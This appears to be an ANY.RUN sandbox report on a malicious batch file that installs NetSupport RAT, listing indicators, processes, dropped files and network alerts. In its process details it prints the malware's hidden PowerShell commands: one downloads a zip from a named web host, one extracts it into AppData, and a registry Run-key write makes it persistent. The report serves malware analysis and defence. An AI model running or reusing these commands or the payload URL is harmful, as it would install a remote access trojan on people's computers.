File name: _9063_update.bat
Full analysis: https://app.any.run/tasks/ac9c33dd-e2bc-49e6-b3f4-7f528238206f
Verdict: Malicious activity
Threats:

NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software.

Analysis date: April 29, 2025, 08:47:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: netsupport, rmm-tool, remote, auto-reg, arch-exec, tool
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (36114), with CRLF line terminators
MD5: D60980E6066C58706C487F77863A2008
SHA1: 3498E5123F367AB41ABE107887AECDF59393F286
SHA256: D6142F48664208710BAB9FCAB8DFCDA66AD75AD756D2CE9C3AA243DCBC29BF4A
SSDEEP: 3072:gHWplleBqYFAfxWhM/HWplleBqYFAfxWhRHWplleBqYFAfxWhL:BYFAf/iYFAf7YFAf6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)
    • Executing a file with an untrusted certificate

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)
      • client32.exe (PID: 4724)
    • Changes the autorun value in the registry

      • reg.exe (PID: 6816)
    • NETSUPPORT mutex has been found

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)
    • Connects to the CnC server

      • client32.exe (PID: 6404)
    • NETSUPPORT has been detected (SURICATA)

      • client32.exe (PID: 6404)
    • NETSUPPORT has been detected (YARA)

      • client32.exe (PID: 6404)
  • SUSPICIOUS

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1660)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1056)
    • Drop NetSupport executable file

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1096)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1096)
    • The executable file from the user directory is run by the CMD process

      • client32.exe (PID: 6404)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1056)
    • Connects to the server without a host name

      • client32.exe (PID: 6404)
    • There is functionality for communication over UDP network (YARA)

      • client32.exe (PID: 6404)
    • There is functionality for taking screenshot (YARA)

      • client32.exe (PID: 6404)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 1660)
      • slui.exe (PID: 1676)
    • The sample compiled with english language support

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)
    • Disables trace logs

      • powershell.exe (PID: 1660)
    • Auto-launch of the file from Registry key

      • reg.exe (PID: 6816)
    • Checks supported languages

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 4152)
      • OpenWith.exe (PID: 5384)
      • OpenWith.exe (PID: 3032)
    • Reads the computer name

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)
    • Manual execution by a user

      • client32.exe (PID: 4692)
      • client32.exe (PID: 4724)
      • OpenWith.exe (PID: 4152)
      • notepad.exe (PID: 2692)
      • notepad.exe (PID: 5112)
      • notepad.exe (PID: 5212)
      • OpenWith.exe (PID: 5384)
      • OpenWith.exe (PID: 3032)
      • notepad.exe (PID: 7048)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 2692)
      • notepad.exe (PID: 5112)
      • notepad.exe (PID: 5212)
      • notepad.exe (PID: 7048)
    • Reads the software policy settings

      • slui.exe (PID: 1676)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 139
Monitored processes: 16
Malicious processes: 5
Suspicious processes: 2

Behavior graph

Processes in the graph, in the order shown ("no specs" and "#NETSUPPORT" are the report's own node labels):
start, cmd.exe (no specs), conhost.exe (no specs), powershell.exe, powershell.exe, #NETSUPPORT client32.exe, reg.exe, slui.exe, #NETSUPPORT client32.exe (no specs), client32.exe (no specs), openwith.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), openwith.exe (no specs), openwith.exe (no specs), notepad.exe (no specs)

Process information

PID: 1056
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\_9063_update.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll

PID: 1096
CMD: powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\admin\AppData\Roaming\Applica.zip', 'C:\Users\admin\AppData\Roaming\Option')"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

PID: 1660
CMD: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.eurobrandsindia.com/wp-content/fore.zip?fd68cc8e93deddf83ed1' -OutFile 'C:\Users\admin\AppData\Roaming\Applica.zip'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 1676
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 2568
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2692
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\client32.ini
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll

PID: 3032
CMD: "C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\lol.cfg
Path: C:\Windows\System32\OpenWith.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Pick an app
Exit code: 2147943623
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

PID: 4152
CMD: "C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\NSM.LIC
Path: C:\Windows\System32\OpenWith.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Pick an app
Exit code: 2147943623
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

PID: 4692
CMD: C:\Users\admin\AppData\Roaming\Option\client32.exe
Path: C:\Users\admin\AppData\Roaming\Option\client32.exe
Parent process: explorer.exe
User: admin
Company: NetSupport Ltd
Integrity Level: MEDIUM
Description: NetSupport Client Application
Exit code: 255
Version: V11.30
Modules (images):
c:\users\admin\appdata\roaming\option\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\users\admin\appdata\roaming\option\pcicl32.dll
c:\windows\syswow64\user32.dll

PID: 4724
CMD: "C:\Users\admin\Desktop\client32.exe"
Path: C:\Users\admin\Desktop\client32.exe
Parent process: explorer.exe
User: admin
Company: NetSupport Ltd
Integrity Level: MEDIUM
Description: NetSupport Client Application
Exit code: 3221225781
Version: V11.30
Modules (images):
c:\users\admin\desktop\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll

Total events: 15 456
Read events: 15 455
Write events: 1
Delete events: 0

Modification events

(PID) Process: (6816) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Support11
Value: C:\Users\admin\AppData\Roaming\Option\client32.exe

Executable files: 28
Suspicious files: 5
Text files: 14
Unknown types: 0

Dropped files

PID 1660 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lcym5pxq.m3q.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 1660 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o4vsptmm.ltp.psm1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 1096 powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p1rx41j1.kwd.ps1 (text)
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID 1660 powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
MD5: DF42E835FDAC5FAED15724A33963AAC3
SHA256: 1AE6906DEE8E8BC2C97684FDD88E7BCCB5C71AFBF4595A036C801280CE775B17

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\AudioCapture.dll (executable)
MD5: 2A82792F7B45D537EDFE58EB758C1197
SHA256: 05AA13A6C1D18F691E552F04A996960917202A322D0DACFD330E553AD56978ED

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\KBDTAM99.DLL (executable)
MD5: CCC736781CF4A49F42CD07C703B3A18B
SHA256: 000C4B5B50966634DF58078511794F83690D693FCCF2ACA5C970C20981B29556

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\TsUsbRedirectionGroupPolicyExtension.dll (executable)
MD5: D89CDA3FF8427DA82DE6CCE39008C5BC
SHA256: F44CC1E23D0D192DCFD84069B27704CD0B2A8E7720EEE43656F57CB474433762

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\PCICHEK.DLL (executable)
MD5: E311935A26EE920D5B7176CFA469253C
SHA256: 0038AB626624FA2DF9F65DD5E310B1206A9CD4D8AB7E65FB091CC25F13EBD34E

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\comcat.dll (executable)
MD5: 835FF05A3F5E16E0FE41E515EA398BD4
SHA256: 8DCFB1E6AA965DF4BD4C0551D03BDFD6472C80219ADA4671910958688FBB4AB6

PID 1096 powershell.exe: C:\Users\admin\AppData\Roaming\Option\client32.exe (executable)
MD5: FCE17B987F321DCE852C8A52116E7EB6
SHA256: AFC45CC0DF7F7E481BFF45C6F62A6418B6AE4C8B474EC36113E05AB7CA7E2743
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 34
TCP/UDP connections: 58
DNS requests: 26
Threats: 5

HTTP requests

PID/Process | Method | HTTP code | IP | URL | CN | Reputation ("-" = not recorded in the report)
- | GET | 304 | 20.109.210.53:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | -
4268 SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | whitelisted
- | GET | 200 | 20.242.39.171:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | -
4268 SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted
4268 SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted

Connections

PID/Process | IP | Domain | ASN | CN | Reputation ("-" = not recorded in the report)
- | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 System | 192.168.100.255:138 | - | - | - | whitelisted
- | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6544 svchost.exe | 20.190.160.66:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1660 powershell.exe | 162.159.134.42:443 | www.eurobrandsindia.com | CLOUDFLARENET | - | unknown
3216 svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
2112 svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2104 svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 System | 192.168.100.255:137 | - | - | - | whitelisted
4268 SIHClient.exe | 20.109.210.53:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.131
  • 20.190.160.132
  • 40.126.32.72
  • 20.190.160.64
  • 40.126.32.74
  • 40.126.32.133
  • 40.126.32.134
whitelisted
google.com
  • 142.250.186.174
whitelisted
www.eurobrandsindia.com
  • 162.159.134.42
unknown
slscr.update.microsoft.com
  • 20.109.210.53
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID/Process | Class | Message ("-" = not recorded in the report)
- | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
- | Misc activity | ET REMOTE_ACCESS NetSupport Remote Admin Checkin
6404 client32.exe | Potentially Bad Traffic | ET INFO HTTP traffic on port 443 (POST)
6404 client32.exe | Misc activity | ET REMOTE_ACCESS NetSupport Remote Admin Checkin
6404 client32.exe | A Network Trojan was detected | REMOTE [ANY.RUN] NetSupport RAT
No debug info